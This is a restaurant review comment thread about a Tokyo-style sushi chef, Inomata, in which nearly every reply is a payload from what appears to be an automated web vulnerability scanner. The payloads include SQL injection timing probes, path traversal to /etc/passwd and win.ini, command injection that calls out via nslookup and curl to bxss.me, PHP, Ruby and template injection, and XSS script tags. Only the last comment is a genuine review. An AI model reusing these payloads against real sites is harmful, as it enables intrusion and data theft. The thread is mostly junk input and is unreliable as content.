QxRDBzOo' OR 889=(SELECT 889 FROM PG_SLEEP(15))--
re: Leo Saito
059ab5Ox') OR 231=(SELECT 231 FROM PG_SLEEP(15))--
re: Leo Saito
nIj5dVeu')) OR 52=(SELECT 52 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
'"
re: Leo Saito
@@9G0pW
re: Leo Saito
(select 198766*667891)
re: Leo Saito
(select 198766*667891 from DUAL)
Wow...inomata is now booked out until 31st December. Not so easy to book now.
re: guest
qQEHo8QA
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+949-949-1=0+0+0+1
re: guest
-1 OR 3+949-949-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
U8Y2htC1
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+204-204-1=0+0+0+1
re: guest
-1 OR 3+204-204-1=0+0+0+1
re: guest
-1); waitfor delay '0:0:15' --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
1 waitfor delay '0:0:15' --
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
aTBvxbPt'; waitfor delay '0:0:15' --
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
-5 OR 939=(SELECT 939 FROM PG_SLEEP(15))--
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-5) OR 816=(SELECT 816 FROM PG_SLEEP(15))--
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1)) OR 46=(SELECT 46 FROM PG_SLEEP(15))--
re: guest
-1); waitfor delay '0:0:15' --
re: guest
vG9ECAni' OR 513=(SELECT 513 FROM PG_SLEEP(15))--
re: guest
1 waitfor delay '0:0:15' --
re: guest
e3hAiWu4') OR 295=(SELECT 295 FROM PG_SLEEP(15))--
re: guest
q7vGVGnd'; waitfor delay '0:0:15' --
re: guest
gTPhZWq2')) OR 794=(SELECT 794 FROM PG_SLEEP(15))--
re: guest
-5 OR 834=(SELECT 834 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
-5) OR 981=(SELECT 981 FROM PG_SLEEP(15))--
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
-1)) OR 410=(SELECT 410 FROM PG_SLEEP(15))--
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
MoNENG3P' OR 660=(SELECT 660 FROM PG_SLEEP(15))--
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@ZUjV0
re: guest
2YKDAxf4') OR 275=(SELECT 275 FROM PG_SLEEP(15))--
re: guest
mm1nhByV')) OR 166=(SELECT 166 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@dvm2s
re: guest
1FYCXDFiO
re: guest
response.write(9456931*9130322)
re: guest
'+response.write(9456931*9130322)+'
re: guest
%0abcc:074625.67-14588.67.50384.19990.2@bxss.me
re: guest
"+response.write(9456931*9130322)+"
re: guest
to@example.com>%0d%0abcc:074625.67-14589.67.50384.19990.2@bxss.me
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
${10000278+9999854}
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
/etc/passwd
re: guest
echo igoeue$()\ zrfmdx\nz^xyu||a #' &echo igoeue$()\ zrfmdx\nz^xyu||a #|" &echo igoeue$()\ zrfmdx\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
&echo wgicnl$()\ szzege\nz^xyu||a #' &echo wgicnl$()\ szzege\nz^xyu||a #|" &echo wgicnl$()\ szzege\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
|echo hvgctu$()\ zwbqsi\nz^xyu||a #' |echo hvgctu$()\ zwbqsi\nz^xyu||a #|" |echo hvgctu$()\ zwbqsi\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitieivstvjibfac14.bxss.me||perl -e "gethostbyname('hitieivstvjibfac14.bxss.me')")
re: guest
)
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
$(nslookup hituwgptqpizg73d82.bxss.me||perl -e "gethostbyname('hituwgptqpizg73d82.bxss.me')")
re: guest
!(()&&!|*|*|
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
&nslookup hitsouxoxlejc7ba29.bxss.me&'\"`0&nslookup hitsouxoxlejc7ba29.bxss.me&`'
re: guest
^(#$!@#$)(()))******
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&(nslookup hitpllfzvnroxa5b48.bxss.me||perl -e "gethostbyname('hitpllfzvnroxa5b48.bxss.me')")&'\"`0&(nslookup hitpllfzvnroxa5b48.bxss.me||perl -e "gethostbyname('hitpllfzvnroxa5b48.bxss.me')")&`'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
|(nslookup hitnphbhjwlby8b2d1.bxss.me||perl -e "gethostbyname('hitnphbhjwlby8b2d1.bxss.me')")
re: guest
file:///etc/passwd
re: guest
`(nslookup hitlkuefvtoggc7153.bxss.me||perl -e "gethostbyname('hitlkuefvtoggc7153.bxss.me')")`
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
;(nslookup hitvvbdkkhxau90a43.bxss.me||perl -e "gethostbyname('hitvvbdkkhxau90a43.bxss.me')")|(nslookup hitvvbdkkhxau90a43.bxss.me||perl -e "gethostbyname('hitvvbdkkhxau90a43.bxss.me')")&(nslookup hitvvbdkkhxau90a43.bxss.me||perl -e "gethostbyname('hitvvbdkkhxau90a43.bxss.me')")
re: guest
/WEB-INF/web.xml
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
Http://bxss.me/t/fit.txt
re: guest
/../../../../../../../../../../boot.ini
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
'.gethostbyname(lc('hitet'.'eqkkzquk148dd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(71).chr(100).chr(78).'
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
/etc/shells
re: guest
".gethostbyname(lc("hitmn"."qnpepzchc6749.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(72).chr(114).chr(77)."
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
c:/windows/win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
bxss.me
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
WEB-INF\web.xml
re: guest
"+"A".concat(70-3).concat(22*4).concat(116).concat(82).concat(98).concat(71)+(require"socket"
Socket.gethostbyname("hiter"+"iwifakjr26369.bxss.me.")[3].to_s)+"
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(97).concat(78).concat(104).concat(72)+(require'socket'
Socket.gethostbyname('hitfe'+'ofrdwxnfc8bd1.bxss.me.')[3].to_s)+'
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
'"
re: guest
';print(md5(31337));$a='
re: guest
<!--
re: guest
";print(md5(31337));$a="
re: guest
${@print(md5(31337))}
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
1
re: guest
1
re: guest
-1 OR 2+430-430-1=0+0+0+1 --
re: guest
-1 OR 3+430-430-1=0+0+0+1 --
re: guest
-1 OR 2+92-92-1=0+0+0+1
re: guest
-1 OR 3+92-92-1=0+0+0+1
re: guest
-1' OR 2+307-307-1=0+0+0+1 --
re: guest
-1' OR 3+307-307-1=0+0+0+1 --
re: guest
-1' OR 2+440-440-1=0+0+0+1 or 'apRaEwhg'='
re: guest
-1' OR 3+440-440-1=0+0+0+1 or 'apRaEwhg'='
re: guest
-1" OR 2+846-846-1=0+0+0+1 --
re: guest
-1" OR 3+846-846-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
GkykmDqa'; waitfor delay '0:0:15' --
re: guest
-5 OR 960=(SELECT 960 FROM PG_SLEEP(15))--
re: guest
-5) OR 827=(SELECT 827 FROM PG_SLEEP(15))--
re: guest
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
re: guest
DaZ0oooi' OR 879=(SELECT 879 FROM PG_SLEEP(15))--
re: guest
gBiz9FOq') OR 779=(SELECT 779 FROM PG_SLEEP(15))--
re: guest
GwadinaI')) OR 845=(SELECT 845 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@DgNFG
re: guest
1Z8OIHR9V0
re: guest
response.write(9936392*9023077)
re: guest
'+response.write(9936392*9023077)+'
re: guest
"+response.write(9936392*9023077)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${9999267+9999146}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
echo dozeyx$()\ cfiolk\nz^xyu||a #' &echo dozeyx$()\ cfiolk\nz^xyu||a #|" &echo dozeyx$()\ cfiolk\nz^xyu||a #
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
&echo trqcbe$()\ rbpnvd\nz^xyu||a #' &echo trqcbe$()\ rbpnvd\nz^xyu||a #|" &echo trqcbe$()\ rbpnvd\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
'.gethostbyname(lc('hitsv'.'kljougqra2a52.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(71).chr(108).chr(76).'
re: guest
|echo hnrbyb$()\ lodmik\nz^xyu||a #' |echo hnrbyb$()\ lodmik\nz^xyu||a #|" |echo hnrbyb$()\ lodmik\nz^xyu||a #
re: guest
/etc/shells
re: guest
".gethostbyname(lc("hitsa"."paaxqxln782ca.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(84).chr(99).chr(68)."
re: guest
expr 9000614455 - 973030
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
gethostbyname(lc('hitvj'.'elwmkkpv91ed7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(73).chr(104).chr(84)
re: guest
(nslookup -q=cname hitinlfcwnojr700b8.bxss.me||curl hitinlfcwnojr700b8.bxss.me))
re: guest
c:/windows/win.ini
re: guest
$(nslookup -q=cname hitrxqotfzvsuf6bc9.bxss.me||curl hitrxqotfzvsuf6bc9.bxss.me)
re: guest
bxss.me
re: guest
Http://bxss.me/t/fit.txt
re: guest
&nslookup -q=cname hitlrlkqettdue63f2.bxss.me&'\"`0&nslookup -q=cname hitlrlkqettdue63f2.bxss.me&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
&(nslookup -q=cname hitnedmumpvqre6988.bxss.me||curl hitnedmumpvqre6988.bxss.me)&'\"`0&(nslookup -q=cname hitnedmumpvqre6988.bxss.me||curl hitnedmumpvqre6988.bxss.me)&`'
re: guest
|(nslookup -q=cname hitjjyudhubxv65847.bxss.me||curl hitjjyudhubxv65847.bxss.me)
re: guest
`(nslookup -q=cname hiteigzlwtkyf6a4a8.bxss.me||curl hiteigzlwtkyf6a4a8.bxss.me)`
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
;(nslookup -q=cname hitmncnagnvrc83d18.bxss.me||curl hitmncnagnvrc83d18.bxss.me)|(nslookup -q=cname hitmncnagnvrc83d18.bxss.me||curl hitmncnagnvrc83d18.bxss.me)&(nslookup -q=cname hitmncnagnvrc83d18.bxss.me||curl hitmncnagnvrc83d18.bxss.me)
re: guest
';print(md5(31337));$a='
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitfdsimhgonebfc48.bxss.me||curl${IFS}hitfdsimhgonebfc48.bxss.me)
re: guest
";print(md5(31337));$a="
re: guest
bxss.me/t/xss.html?%00
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitaghupryjzwf6893.bxss.me||curl${IFS}hitaghupryjzwf6893.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitaghupryjzwf6893.bxss.me||curl${IFS}hitaghupryjzwf6893.bxss.me)&`'
re: guest
${@print(md5(31337))}
re: guest
${@print(md5(31337))}\
re: guest
"+"A".concat(70-3).concat(22*4).concat(107).concat(71).concat(98).concat(72)+(require"socket"
Socket.gethostbyname("hitkd"+"kyntejtpbfe78.bxss.me.")[3].to_s)+"
re: guest
'.print(md5(31337)).'
re: guest
'+'A'.concat(70-3).concat(22*4).concat(122).concat(86).concat(113).concat(83)+(require'socket'
Socket.gethostbyname('hituz'+'fvkobxca17567.bxss.me.')[3].to_s)+'
re: guest
'"()
re: guest
'A'.concat(70-3).concat(22*4).concat(105).concat(73).concat(104).concat(66)+(require'socket'
Socket.gethostbyname('hitdg'+'zmpxwidqd8625.bxss.me.')[3].to_s)
re: guest
'&&sleep(27*1000)*aytrxv&&'
re: guest
"&&sleep(27*1000)*nvbqgq&&"
re: guest
'"
re: guest
'||sleep(27*1000)*tbaoai||'
re: guest
<!--
re: guest
"||sleep(27*1000)*svzpuj||"
re: guest
replies
re: guest
replies�
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >A1ai(9799)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitmbcqntltgs1c8d9.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >A1ai(9609)</ScRiPt>
re: guest
9472738
re: guest
Fodg1YGI
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
bY1JAXIO'; waitfor delay '0:0:15' --
re: guest
-1 OR 692=(SELECT 692 FROM PG_SLEEP(15))--
re: guest
-1) OR 96=(SELECT 96 FROM PG_SLEEP(15))--
re: guest
-1)) OR 195=(SELECT 195 FROM PG_SLEEP(15))--
re: guest
nmYWJf7v' OR 618=(SELECT 618 FROM PG_SLEEP(15))--
re: guest
INgBDRcp') OR 898=(SELECT 898 FROM PG_SLEEP(15))--
re: guest
wPg1YOjf')) OR 43=(SELECT 43 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@0yJOq
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
I was just there and I agree with Wanderlusting. The rice is not the best and it sort of dies out after a few pieces, but I have to say the neta is some of the best out there. Every single piece of sushi I got was good, with plenty of highlights. His Oma maguro was some of the best tuna I've had; all the cuts were still marinated but compared to last time, the zuke was more mellow and I found the balance of the entire meal to be much better. Overall I think Inomata-san offers extremely high level sushi, with emphasis on truly top-quality ingredients (I would easily give the sushi at least 9/10). The location is not ideal but nigiri lovers should still make the pilgrimage.
The customer service was outstanding, as Mrs. Inomata is engaging and helps to initiate good conversation between diners and the chef. The price was less nice, but I feel like you get what you pay for...
